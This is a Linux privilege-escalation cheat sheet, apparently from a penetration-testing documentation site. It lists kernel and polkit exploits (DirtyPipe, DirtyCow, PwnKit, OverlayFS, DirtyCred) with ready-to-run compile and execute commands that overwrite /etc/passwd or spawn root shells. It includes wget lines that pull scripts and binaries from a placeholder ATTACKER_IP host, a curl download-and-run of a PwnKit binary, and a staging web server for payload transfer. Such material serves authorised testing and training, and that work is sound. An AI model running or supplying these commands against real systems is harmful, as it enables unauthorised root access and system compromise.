Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Methodology
uname -r → check kernel version → find exploit → compile → execute
Linux Exploit Suggester
les.sh (Recommended)
https://github.com/The-Z-Labs/linux-exploit-suggester
# Transfer to target
wget http://ATTACKER_IP/les.sh
chmod +x les.sh
./les.sh
linux-exploit-suggester-2 (Perl)
https://github.com/jondonas/linux-exploit-suggester-2
perl les2.pl
CVE-2022-0847 — DirtyPipe (Kernel 5.8 - 5.16.11)
Overwrite read-only files via pipe splice. Instant root.
Check
uname -r
# Vulnerable: 5.8 <= kernel < 5.16.11
Exploit
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
gcc exploit-1.c -o exploit
./exploit
# Overwrites /etc/passwd → root shell
gcc exploit-2.c -o exploit
./exploit /usr/bin/su
CVE-2016-5195 — DirtyCow (Kernel 2.6.22 - 4.8.3)
Race condition in copy-on-write. Write to read-only mappings.
Check
uname -r
# Vulnerable: 2.6.22 <= kernel <= 4.8.3
Exploit — Overwrite /etc/passwd
https://github.com/firefart/dirtycow
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword
# Creates user 'firefart' with root UID
su firefart
Exploit — SUID Method
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
gcc -pthread cowroot.c -o cowroot
./cowroot
CVE-2021-4034 — PwnKit (pkexec)
Polkit pkexec local privilege escalation. Works on almost all Linux distros.
Check
pkexec --version
# Vulnerable: polkit < 0.120
Exploit
https://github.com/ly4k/PwnKit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit
https://github.com/arthepsy/CVE-2021-4034
gcc cve-2021-4034.c -o pwnkit
./pwnkit
CVE-2021-3493 — OverlayFS (Ubuntu)
Ubuntu kernel overlay filesystem privilege escalation.
# Vulnerable: Ubuntu 14.04 - 20.10
https://github.com/briskets/CVE-2021-3493
gcc exploit.c -o exploit
./exploit
CVE-2022-2588 — Dirty Cred (Kernel 5.x)
https://github.com/Markakd/CVE-2022-2588
gcc exploit.c -o exploit -lpthread
./exploit
CVE-2023-0386 — OverlayFS (Kernel < 6.2)
https://github.com/xkaneiki/CVE-2023-0386
make all
# Terminal 1
./fuse ./ovlcap/lower ./gc
# Terminal 2
./exp
Compile on Attacker (Cross-Compile)
If target has no gcc:
# Match target architecture
gcc -static -o exploit exploit.c
# Transfer to target
python3 -m http.server 80
wget http://ATTACKER_IP/exploit
chmod +x exploit
./exploit
Quick Reference
| CVE | Kernel | Year | Reliability |
|---|
| DirtyCow (CVE-2016-5195) | 2.6.22 - 4.8.3 | 2016 | High |
| PwnKit (CVE-2021-4034) | Any (polkit) | 2021 | Very High |
| OverlayFS (CVE-2021-3493) | Ubuntu specific | 2021 | High |
| Baron Samedit (CVE-2021-3156) | sudo < 1.9.5p2 | 2021 | High |
| DirtyPipe (CVE-2022-0847) | 5.8 - 5.16.11 | 2022 | Very High |
| DirtyCred (CVE-2022-2588) | 5.x | 2022 | Medium |
| OverlayFS (CVE-2023-0386) | < 6.2 | 2023 | High |